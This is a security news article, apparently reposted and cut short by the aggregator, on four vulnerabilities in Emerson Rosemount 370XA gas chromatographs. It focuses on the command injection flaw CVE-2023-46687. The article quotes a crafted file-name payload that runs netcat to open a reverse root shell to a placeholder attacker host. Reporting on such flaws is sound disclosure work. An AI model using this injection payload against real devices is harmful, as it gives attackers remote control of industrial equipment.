Multiple critical vulnerabilities have been identified in Emerson gas chromatographs, posing risks such as unauthorized access to sensitive data, denial-of-service conditions, and arbitrary command execution. Gas chromatographs are essential in various industries like chemical, environmental, and healthcare sectors for analyzing and separating chemical compounds. The Emerson Rosemount 370XA, a widely used model, uses a proprietary protocol for communication between the device and a technician’s computer.
Security researchers from Claroty’s Team82 discovered four significant vulnerabilities: two command injection flaws, an authentication bypass, and an authorization vulnerability. One of the command injection flaws received a critical CVSS v3 score of 9.8.
The vulnerability, designated CVE-2023-46687, is an unauthenticated remote code execution or command injection flaw found in the “forced calibration” command type. It involves a system function that uses a constructed shell command with a user-provided file name without proper sanitization, allowing attackers to inject arbitrary shell commands.
Attackers can exploit this vulnerability by supplying crafted inputs, such as gunzip -c ;nc -e /bin/sh ATTACKER_MACHINE 1337;> name_of_the_expanded_file, leading to arbitrary code execution in the root shell context.
Another vulnerability, CVE-2023-51
[…]
Content was cut in order to protect the source.Please visit the source for the rest of the article.
[…]
Content was cut in order to protect the source.Please visit the source for the rest of the article.
This article has been indexed from CySecurity News – Latest Information Security and Hacking Incidents
Read the original article: